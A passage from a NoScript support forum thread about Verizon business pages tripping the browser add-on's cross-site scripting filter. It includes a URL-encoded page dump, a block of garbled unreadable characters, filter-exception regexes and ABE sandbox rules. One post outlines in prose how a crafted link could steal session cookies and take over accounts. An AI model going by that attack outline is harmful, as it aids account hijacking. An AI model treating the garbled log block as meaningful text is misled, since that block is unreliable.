%3E%0D%0A%09++++++++++++++++%3Cspan+class%3D%22divider_new%22%3E%7C%3C%2Fspan%3E%0D%0A%09++++++++++++++++%3C%2Fli%3E%0D%0A%09++++++++++++++++%3Cli%3E%3Cspan+class%3D%22nolink%22+style%3D%22font-size%3A12px%3B%22%3E%3Cfont+color%3D%22black%22%3E+%C2%A9+2013+Verizon+%3C%2Ffont%3E%3C%2Fspan%3E%3C%2Fli%3E%0D%0A%09++++++++++++++++%3C%2Ful%3E%0D%0A%09+++++++++++++%3C%2Fdiv%3E%0D%0A%09++++++++++++%09%0D%0A%09++++++++++++%0D%0A%0D%0A%09%0D%0A%3C%2Fdiv%3E%0D%0A+++%3C%21--From+--%3E%0D%0A%09%0D%0A%09++++%3Cspan+id%3D%22footer1_lblSession%22+style%3D%22display%3Ainline-block%3Bcolor%3AWhite%3Bfont-size%3A10px%3Bwidth%3A73px%3B%22%3E%3C%2Fspan%3E%0D%0A++++++++%3Cspan+id%3D%22footer1_lblEpSession%22+style%3D%22display%3Ainline-block%3Bcolor%3AWhite%3Bfont-size%3A10px%3Bwidth%3A73px%3B%22%3E%3C%2Fspan%3E%0D%0A++++++++%3Cspan+id%3D%22footer1_lblServerName%22+style%3D%22display%3Ainline-block%3Bcolor%3AWhite%3Bfont-size%3A10px%3Bwidth%3A73px%3B%22%3EFE%3C%2Fspan%3E%0D%0A++++++++%3Cspan+id%3D%22footer1_DatacenterValue%22%3E%3C%2Fspan%3E%09%0D%0A%09%09%09%09%09%3Cbr%3E%0D%0A%09%3C%21--%3C%2Fspan%3E--%3E%0D%0A%09%3C%2Fdiv%3E%0D%0A%3C%2Fdiv%3E%0D%0A%0D%0A%3Cbr%3E%0D%0A%0D%0A%3Cdiv+id%3D%22CJTag%22+style%3D%22DISPLAY%3A+block%22%3E%0D%0A++++%0D%0A%3C%2Fdiv%3E%0D%0A%0D%0A%3C%21--FloodLight+Tag%2CAdded+By+Sasanka+on+21st+May+2010%2C+Please+Do+not+remove+--%3E%0D%0A%3Cdiv+id%3D%22FLTag%22+style%3D%22DISPLAY%3Anone%22%3E%0D%0A++++%0D%0A%3C%2Fdiv%3E%0D%0A%3C%21--+CT+Tag%2CAdded+By+Sasanka+on+21st+May+2010%2C+Please+do+not+Remove+--%3E%0D%0A%3Cdiv+id%3D%22CTTag%22+style%3D%22DISPLAY%3Anone%22%3E%0D%0A++++%0D%0A%3C%2Fdiv%3E%0D%0A%0D%0A%3Cscript+language%3D%22javascript%22%3E%0D%0A%0D%0Afunction+OpenPop%28sUrl%2C+title%29%0D%0A%7B%0D%0A++++window.open%28sUrl%2C+title%2C+%27toolbar%3D0%2Cscrollbars%3D1%2Cdependent%3Dyes%2Clocation%3D0%2Cstatusbar%3D0%2Cmenubar%3D0%2Cwidth%3D700%2Cheight%3D500%2Cleft%3D30%2Ctop%3D40%2Cresizable%3D0%27%29%3B+%0D%0A++++return%3B%0D%0A%7D%0D%0A%0D%0A%0D%0A%2F%2F+Changes+made+for+Release+TN+Changes%0D%0Aif+%28document.body+%21%3D+null+%26%26+typeof%28BrowserClose%29+%21%3D+%27undefined%27%29%0D%0A%7B%0D%0A%0D%0A++++document.body.onbeforeunload+%3D+BrowserClose%3B%0D%0A++++%0D%0A%7D%0D%0A%0D%0Avar+C1Moffer%3D%22%22%3B%0D%0Aif%28C1Moffer%21%3Dnull+%26%26+C1Moffer%21%3D%22Y%22%29%0D%0A%7B%0D%0A++++if+%28document.body+%21%3D+null%29%0D%0A++++%7B%0D%0A++++++++usrAgnt+%3D+navigator.appName%3B%0D%0A%09++++usrAgnt+%3D+usrAgnt.toLowerCase%28%29%3B%0D%0A%0D%0A%09++++if+%28usrAgnt+%3D%3D+%27netscape%27%29%0D%0A%09++++%7B%0D%0A%09%09++++window.onbeforeunload+%3D+function%28event%29+%7B+try+%7B+SaveCartBrowserClose%28event%29%3B+%7D+catch+%28e%29+%7B%7D+%7D%0D%0A%09++++%7D%0D%0A%09++++else%0D%0A%09++++%7B%0D%0A%09%09++++document.body.onbeforeunload+%3D+function%28%29+%7B+try+%7B+return+SaveCartBrowserClose%28event%29%3B+%7D+catch+%28e%29+%7B%7D+%7D%3B%0D%0A%09++++%7D%0D%0A++++%7D%0D%0A%7D%0D%0A%0D%0A%2F%2FEnd+of+Changes+made+for+Release+TN+Changes%0D%0Acustom_var+%3D+%22%22%3B%2F%2Fthis+variable+used+in+oo_engine.js+file%0D%0Aif+%28%28typeof+oOobj5+%21%3D+%27undefined%27%29+%26%26+%28oOobj5+%21%3D+null%29+%26%26+%28oOobj5.Metrics+%21%3D+null%29+%26%26+%28oOobj5.Metrics.custom+%21%3D+null%29%29%0D%0A%09oOobj5.Metrics.custom.sessionid+%3D+%22%22%3B%0D%0A%0D%0A%3C%2Fscript%3E%0D%0A%0D%0A%0D%0A%3Cscript+type%3D%22text%2Fjavascript%22%3E%0D%0Avar+maskArr+%3D+document.getElementsByTagName%28%22input%22%29%3B%0D%0Avar+isVECFlow+%3D+%27%27%3B%0D%0Aif%28document.location.href.indexOf%28%22repcobrowse%22%29%3E-1%29+%0D%0A%7B%0D%0A++++++if%28typeof%28maskArr%29%21%3Dnull%29+%0D%0A++++++%7B%0D%0A++++++++++++for%28i%3D0%3Bi+%3C+maskArr.length%3B+i%2B%2B%29%0D%0A++++++++++++%7B%0D%0A++++++++++++++++++if+%28maskArr%5Bi%5D.id.indexOf%28%22_SECUREINFO%22%29%3E0%29%0D%0A++++++++++++++++++%7B%0D%0A++++++++++++++++++++maskArr%5Bi%5D.value%3D%22***%22%3B%0D%0A++++++++++++++++++%7D%0D%0A++++++++++++%7D%0D%0A++++++%7D%0D%0A%7D%0D%0A%3C%2Fscript%3E%0D%0A+%0D%0A%09++%0D%0A++++++++%3Cscript+src%3D%22..%2Fcommon%2Fincludes%2Fjs%2Fcb.js%22%3E%3C%2Fscript%3E%0D%0A++++++++%3Cscript+src%3D%22..%2Fcommon%2Fincludes%2Fjs%2Fbootstrapper.js%22%3E%3C%2Fscript%3E%0D%0A++++++++%3Cscript+src%3D%22..%2Fcommon%2Fincludes%2Fjs%2Fparser.js%22%3E%3C%2Fscript%3E%0D%0A++++++++%3Cscript+src%3D%22..%2Fcommon%2Fincludes%2Fjs%2Fsandbox.js%22%3E%3C%2Fscript%3E%0D%0A%0D%0A++++++++%3Cscript+src%3D%22..%2Fcommon%2Fincludes%2Fjs%2Ftabset.js%22%3E%3C%2Fscript%3E%0D%0A%0D%0A++++++++%3Cscript+src%3D%22..%2Fcommon%2Fincludes%2Fjs%2Foverlay.js%22%3E%3C%2Fscript%3E%0D%0A%0D%0A++++++++%0D%0A++++++++%3Cscript+src%3D%22..%2Fcommon%2Fincludes%2Fjs%2Fmodal.js%22%3E%3C%2Fscript%3E%0D%0A++++++++%0D%0A%0D%0A++++++++%3Cscript+src%3D%22..%2Fcommon%2Fincludes%2Fjs%2Fscroller.js%22%3E%3C%2Fscript%3E%0D%0A%0D%0A++++++++%3Cscript+src%3D%22..%2Fcommon%2Fincludes%2Fjs%2Ftooltip.js%22%3E%3C%2Fscript%3E%0D%0A%0D%0A+++++++%0D%0A+++++++%0D%0A++++++%0D%0A%0D%0A%0D%0A%3Cscript+language%3D%22javascript%22+src%3D%22https%3A%2F%2Fcollaborateext.verizon.com%2Fpre%2Fprescripts%2FFiosOR7001%2Fi2cpre.js%22%3E%3C%2Fscript%3E%0D%0A%0D%0A%3Cscript+type%3D%22text%2Fjavascript%22+lang%3D%22javascript%22%3E%0D%0A+var+aimsZip+%3D+%22%22%3B%0D%0A+var+aimsState+%3D+%22%22%3B%0D%0A+var+aimsSession++%3D+%22%22%3B%0D%0A+var+productdetails+%3D%22%22%3B%0D%0A+var+fios+%3D%22%22%3B+%0D%0A%2F%2FWR+70676+-+Chat+Platform+Migration+SMB+AMIS+-+Sathish+19%2FSep%2F2011%0D%0A+var+actualBundleCode%3D+%22%22%3B%0D%0A+var+aimsFlow+%3D%22%22%3B%0D%0A+var+aimsChatCreditFlow%3D%220%22%3B%0D%0A+%2F%2FNewly+added+by+Sushanth+for+the+AIMS+Credit+Chat+%0D%0A+var+newconnect+%3D%22%22%3B%0D%0A+var+winback+%3D%22%22%3B+%0D%0A+var+cvcnumber+%3D%22%22%3B+++%2F%2F+Credit+Refrence+No%0D%0A+var+onetimefee+%3D%22%22%3B%0D%0A+var+ordertotal+%3D%22%22%3B%0D%0A+var+ordernumber+%3D%22%22%3B%09%2F%2F+MON+++%0D%0A+var+actualName+%3D%22%22%3B++%2F%2F+LastName+FirstName%0D%0A+var+actualEmail+%3D%22%22%3B%0D%0A+var+accountnumber+%3D%22%22%3B%0D%0A+var+productCode%3D%22%22%3B%0D%0A+%0D%0A+if%28window.attachEvent+%21%3D+null%29%0D%0A++window.attachEvent%28%22onload%22%2CSetCustomerInfo%29%3B%0D%0Aelse+if%28window.addEventListener+%21%3D+null%29+%0D%0A++window.addEventListener%28%22load%22%2CSetCustomerInfo%2Ctrue%29%3B%0D%0A++++%0D%0Afunction+SetCustomerInfo%28%29%0D%0A%7B++%0D%0A%09if%28typeof++aims_setCustomerInfo++%21%3D+%22undefined%22%29+%0D%0A%09%7B%0D%0A%09%09aims_setExtraCustomerInfo%28%27ZIP_CODE%27%2CaimsZip%29%3B%09%2F%2F+zip+code++as+a+String+Value.%0D%0A%09%09aims_setExtraCustomerInfo%28%27DOTCOM_SESSIONID%27%2CaimsSession%29%3B+%0D%0A%09%09aims_setCustomerInfo%28%27STATE%27%2CaimsState%29%3B+%0D%0A%09%09%2F%2FWR+70676+-+Chat+Platform+Migration+SMB+AMIS+-+Sathish+19%2FSep%2F2011%0D%0A%09%09%2F%2Fif%28aimsFlow%21%3Dnull+%26%26+aimsFlow%21%3D%22%22%29%0D%0A%09%09%09%2F%2Faims_setExtraCustomerInfo+%28%27other%27%2C+aimsFlow+%2B+%22_SMB%22%29%3B%0D%0A%09%09%2F%2Felse%0D%0A%09%09+++aims_setExtraCustomerInfo%28%27other%27%2CaimsFlow%29%3B%0D%0A%09%09aims_setExtraCustomerInfo%28%27BundleCode%27%2CactualBundleCode%29%3B%0D%0A%09%09aims_setExtraCustomerInfo%28%27aimsChatCreditFlow%27%2CaimsChatCreditFlow%29%3B%0D%0A%09%09%2F%2F+Newly+added+by+Sushanth+for+the+AIMS+Credit+Chat%0D%0A%09%09aims_setExtraCustomerInfo%28%27NEW_CONNECT%27%2Cnewconnect%29%3B+%2F%2F+Flag+to+indiciate+if+it+is+a+new+connect+customer%0D%0A%09%09aims_setExtraCustomerInfo%28%27WINBACK%27%2Cwinback%29%3B%09++++%2F%2F+flag+to+indicate+if+it+is+a+winback+customer%0D%0A%09%09aims_setExtraCustomerInfo%28%27CRV_NUMBER%27%2Ccvcnumber%29%3B+%0D%0A%09%09aims_setExtraCustomerInfo%28%27ONE_TIME_FEE%27%2Conetimefee%29%3B+%2F%2Fone+time+fee+amount%0D%0A%09%09aims_setExtraCustomerInfo%28%27ORDER_TOTAL%27%2Cordertotal%29%3B+%2F%2Forder+total+amount%0D%0A%09%09aims_setExtraCustomerInfo%28%27ORDER_NUMBER%27%2Cordernumber%29%3B+%2F%2FMON+if+exists+or+individual+order+number+if+available.%0D%0A%09%09aims_setExtraCustomerInfo%28%27ACCOUNT_NUMBER%27%2Caccountnumber%29%3B+%2F%2Fif+existing+customer%09%09%0D%0A%09%09aims_setCustomerInfo%28%27NAME%27%2CactualName%29%3B++%2F%2Fcustomer+name%0D%0A%09%09aims_setCustomerInfo%28%27EMAIL%27%2CactualEmail%29%3B++%2F%2Fcustomer+Email%0D%0A%09%09aims_setExtraCustomerInfo%28%27PRODUCT_DETAILS%27%2Cproductdetails%29%3B%0D%0A%09%09aims_setExtraCustomerInfo%28%27FIOS%27%2Cfios%29%3B%0D%0A%09%09aims_setExtraCustomerInfo%28%27product+code%27%2CproductCode%29%3B%09%2F%2F+Qualified+Products%0D%0A%09%09aims_setExtraCustomerInfo%28%27mon%27%2Cordernumber%29%3B+%2F%2FMON+if+exists+or+individual+order+number+if+available.%0D%0A%09%7D%0D%0A%7D%0D%0A%3C%2Fscript%3E%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A++++%3C%2Fform%3E%0D%0A%0D%0A%0D%0A%3Cspan+style%3D%22display%3A+none%3B%22+id%3D%22PREhiddenSpan%22%3E%3Cform+name%3D%22PREhtmlSourceForm%22+id%3D%22PREhtmlSourceForm%22+method%3D%22post%22+action%3D%22https%3A%2F%2Fcollaborateext.verizon.com%2Fpre%2Fpre%2Fpre.serv%22+target%3D%22PREmyFrame%22%3E%3Cinput+name%3D%22PREhtmlSource%22+id%3D%22PREhtmlSource%22+value%3D%22%22+type%3D%22hidden%22%3E%3Cinput+id%3D%22PREclientURL%22+name%3D%22PREclientURL%22+value%3D%22%22+type%3D%22hidden%22%3E%3Cinput+name%3D%22pagesource%22+id%3D%22pagesource%22+value%3D%22true%22+type%3D%22hidden%22%3E%3Cinput+name%3D%22pagerefresh%22+id%3D%22pagerefresh%22+value%3D%22false%22+type%3D%22hidden%22%3E%3C%2Fform%3E%3Ciframe+name%3D%22PREmyFrame%22+src%3D%22javascript%3Afalse%3B%22+frameborder%3D%221%22+height%3D%22200px%22+width%3D%22450px%22%3E%3C%2Fiframe%3E%3C%2Fspan%3E%3C%2Fbody%3E%3C%2Fhtml%3E] from [https://www22.verizon.com/FORYOURSMALLBIZ/GoFlow/MyVerizonNew/RegistrationBridge.aspx]: transformed into a download-only GET request.
Code: Select all
[NoScript InjectionChecker] HTML injection:
"rº,¡ûUË+nv*
>õ¶+eyW«:'
§ê+×Rz»âqë?¶+ezÇ+mʵìmþ6¯jÇ+l?þw±ºÇ§²(!µéÜ¢oïz¸³¢Á¢l¶¶©Ïìr¸©¶X§·¥ĂËrë!yëmʵìmýË,·ăð¨j'þ)Üç^³÷,³òÚÊrË%y+z,·)^²¶Ü©|^ÆßܲÈky?
¦¢âÉnuë?rË?:·^Ë,±Êâ¦Û+tÜ¢i¨ø§r[zÏã³ð¨j'éܶ*'²;-ʵìmþ6¯jÇ+±Êâ¦Û®*m²·ýÊ&ÿw%¹×¬þ;?~éܶ*'²;-ʵìmþ6¯jÇ+±Êâ¦Û®*m·*^Ă×±·øÚ½«®*m©à¹¨Ă6¯jÇ+l?r¦¢âÉnuë?ÏÀuСjxIêïÇ£³û®*m²Ü¥zÜ©|^ÆßܲÁÞi׫FiÉ ®§uÊ%¢·]u×]²§í©¢ +©Rj{,z¸íÁè Óh®f¥íJ,Þ×jq<Ö¦xZ'´V¦\®&¥I©ì±êâ|Z'·¢A¢WE¢{R7µÞii×b ^~ݹ§ëÇ
¢{Ejh¥È
âjTË®'Å¢{pz(!´%tZ'µ(³{]©Æv)à®(!·q
§ââJZuاW·q±êïǯz»bq©Z('']çèÛ"Ííx§èÜmïM¢«yÚZuاW·q~írh÷úëMzÇ{_¢{l7µÚ_¢{_jh¥È
âjTÄ®'éi×b ^~Þ4§ëÇ¢{l7µÞ_¢{pz(!µº%uú'µö¦\®&¥I©ìIêâ|]N®øxZ'´V¦\®&¥I©ì±êâ|Z'·¢A¢WE¢{R7µâii×b ^~ݹ§(à秺WëAI®§Òii×b
)ÅÆ«zÐeX¥Ël·)^Þm§$º.Û«ÿ⨳÷ë[§$'碷©y«eyûuÒfj¸"Ú)Òfj¸"¸ Ý)Æf«)Û¢ÛhJqªày^~Ýt§ZuاÚ)æii×b
ât§Zuاº-¶´§ZuاW·])ÆX§z¢uÙé¢{l7½¦×èÜmæjW(ôÓK¥néezÐef«)ô§ZuاJqnéezÐeX¥Ël·)^Þm§$º.Û«ÿ⨳öî¹ZrGh¶Þ¥æçí×Jqªà{h§Jqªàzât§®§nm¢m)Æf«)åyûuÒii×bh§q¥§]x+mÒii×bè¶Ú&Òii×b ^~ß)ÆX§z¢uÙé¢{l7½¦×(ôÓOí+ºY^¶X¬µÉZ²È¬ºÇ~íríz{m
«ajËkiצj¹¢«mj|¬º«±Êâ¦Û^ÆßëAFf«)ô§ZuاJqnéezÐe§c)b²Û-ÊW§¢wiÉ ®§vêåÿø¦j¬ý»¥nVÚ-'碷©y«eyûuæfj¸"Ú)Òfj¸"¸ Ý)Æf«)Û¢ÛhJqªày^~Ý©Æv)à¶x§Zuا¸ Ý)Æv)ànm¢m)Æv)àçíòew¡z(!·]ú'¶È³{Úmrh¯M4þËrïáy§[¡Ü«,ĂÝzº'ĀëÞ¬¶²>n¥(hÁǧµêߢ¹§jgæÖg¦-iËb¢
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.19) Gecko/20110420 SeaMonkey/2.0.14 Pinball NoScript FlashGot AdblockPlus
Mozilla/5.0 (Windows NT 5.1; rv:20.0) Gecko/20100101 SeaMonkey/2.17a2
Re: Verizon Business XSS Issues
And lastly, thankfully: http://pastebin.com/tJKE1M2K
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.19) Gecko/20110420 SeaMonkey/2.0.14 Pinball NoScript FlashGot AdblockPlus
Mozilla/5.0 (Windows NT 5.1; rv:20.0) Gecko/20100101 SeaMonkey/2.17a2
Re: Verizon Business XSS Issues
Stuff such as "Change My Plan" cannot be seen until you log into your account. But just going to the main page without logging in results in a XSS error as well:
"NoScript filtered a potential cross-site scripting (XSS) attempt from [https://business.verizon.com]."
URL:
Console Information:
http://pastebin.com/Vuu4n6iy
http://pastebin.com/AE6xP5V7
I can successfully bypass this XSS error. However...
Once logged in and attempting to access something like "Change My Plan" a new window opens:
"NoScript filtered a potential cross-site scripting (XSS) attempt from [https://www22.verizon.com]."
URL:
Console Information:
http://pastebin.com/573k6VeC
http://pastebin.com/wkHegEbm
And it is these windows that result in loops wherein Unsafe Reload doesn't work.
Hope this helps.
"NoScript filtered a potential cross-site scripting (XSS) attempt from [https://business.verizon.com]."
URL:
Code: Select all
http://business.verizon.net/SMBPortalWeb/vanity.url?orig_url=/SMBPortalWeb/sbcLandinghttp://pastebin.com/Vuu4n6iy
http://pastebin.com/AE6xP5V7
I can successfully bypass this XSS error. However...
Once logged in and attempting to access something like "Change My Plan" a new window opens:
"NoScript filtered a potential cross-site scripting (XSS) attempt from [https://www22.verizon.com]."
URL:
Code: Select all
https://www22.verizon.com/FORYOURSMALLBIZ/GOFLOW/Common/LocalBusinessOfficeCC.aspxhttp://pastebin.com/573k6VeC
http://pastebin.com/wkHegEbm
And it is these windows that result in loops wherein Unsafe Reload doesn't work.
Hope this helps.
Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0
Re: Verizon Business XSS Issues
Those errors look very much like the site is deliberately assembling its pages using XSS... 
Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0
-
Giorgio Maone
- Site Admin
- Posts: 9526
- Joined: Wed Mar 18, 2009 11:22 pm
- Location: Palermo - Italy
- Contact:
Re: Verizon Business XSS Issues
In facts, that looks so.Thrawn wrote:Those errors look very much like the site is deliberately assembling its pages using XSS...
The only work-around is adding an exception in NoScript Options|Advanced|XSS like this:
Code: Select all
^@https://www\d*\.verizon\.com/FORYOURSMALLBIZ/
Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0
Re: Verizon Business XSS Issues
This corrected the error when accessing the deep pages, thanks so much. Can you give me a similar one for the business.verizon.com address as well?Giorgio Maone wrote: The only work-around is adding an exception in NoScript Options|Advanced|XSS like this:Code: Select all
^@https://www\d*\.verizon\.com/FORYOURSMALLBIZ/
Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0
Re: Verizon Business XSS Issues
How about
Code: Select all
^https://business\.verizon\.com/MyBusinessAccount/*Mozilla/5.0 (Windows NT 5.1; rv:19.0) Gecko/20100101 Firefox/19.0
Re: Verizon Business XSS Issues
I gave it a try, but it didn't work. If it helps the full URL is:Tom T. wrote:How aboutCode: Select all
^https://business\.verizon\.com/MyBusinessAccount/*
Code: Select all
http://business.verizon.net/SMBPortalWeb/vanity.url?orig_url=/SMBPortalWeb/sbcLandingMozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0
Re: Verizon Business XSS Issues
If you're going to do this, then please bear in mind that this site is almost certainly vulnerable to real XSS attacks, even though this is a false positive. You should, as a minimum, protect it using RequestPolicy or with an ABE rule such as:
Or better yet, replace Sandbox with Deny, unless it breaks something.
And you really should contact the Verizon webmaster, to strongly challenge their site design. It's a serious menace to their customers, and shows a total lack of security awareness from their web developers.
Code: Select all
Site .verizon.com
Accept from SELF++
Sandbox
And you really should contact the Verizon webmaster, to strongly challenge their site design. It's a serious menace to their customers, and shows a total lack of security awareness from their web developers.
Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:19.0) Gecko/20100101 Firefox/19.0
Re: Verizon Business XSS Issues
I'm not sure I could even explain the problem, but maybe I'll post it on their forums 
Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0
Re: Verizon Business XSS Issues
Well, what they've basically done is: Instead of using their keys, they've just removed the lock from their front door. Either they were too lazy to build the site properly, or (even scarier) they were totally unaware of just how dangerous their setup is. Either way, someone didn't do their job properly at all.ALbino wrote:I'm not sure I could even explain the problem, but maybe I'll post it on their forums
If I took the time, I expect that I could assemble a link right now that would, if you clicked on it, take you to Verizon and execute any JavaScript that I wanted. I could then put that link onto a website under my control, and make visitors go to it, maybe by redirecting them, or launching a hidden IFRAME. My JavaScript would be embedded in the Verizon page, so it would have the same privileges as JavaScript coming from Verizon itself, allowing me to read your session cookie and account information, impersonate you and take action on your account, etc. After all, the front door is unlocked.
If you're going to use the XSS filter exception that Giorgio suggested, then please do yourself a favor and use ABE as well. As Giorgio said, the suggested exception is a workaround for the fact that the site breaks. It doesn't solve the real problem.
Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:19.0) Gecko/20100101 Firefox/19.0
Re: Verizon Business XSS Issues
Thrawn wrote:Well, what they've basically done is: Instead of using their keys, they've just removed the lock from their front door. Either they were too lazy to build the site properly, or (even scarier) they were totally unaware of just how dangerous their setup is. Either way, someone didn't do their job properly at all.
If I took the time, I expect that I could assemble a link right now that would, if you clicked on it, take you to Verizon and execute any JavaScript that I wanted. I could then put that link onto a website under my control, and make visitors go to it, maybe by redirecting them, or launching a hidden IFRAME. My JavaScript would be embedded in the Verizon page, so it would have the same privileges as JavaScript coming from Verizon itself, allowing me to read your session cookie and account information, impersonate you and take action on your account, etc. After all, the front door is unlocked.
If you're going to use the XSS filter exception that Giorgio suggested, then please do yourself a favor and use ABE as well. As Giorgio said, the suggested exception is a workaround for the fact that the site breaks. It doesn't solve the real problem.
I went ahead and added the ABE. Thanks to both of you for that.
Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0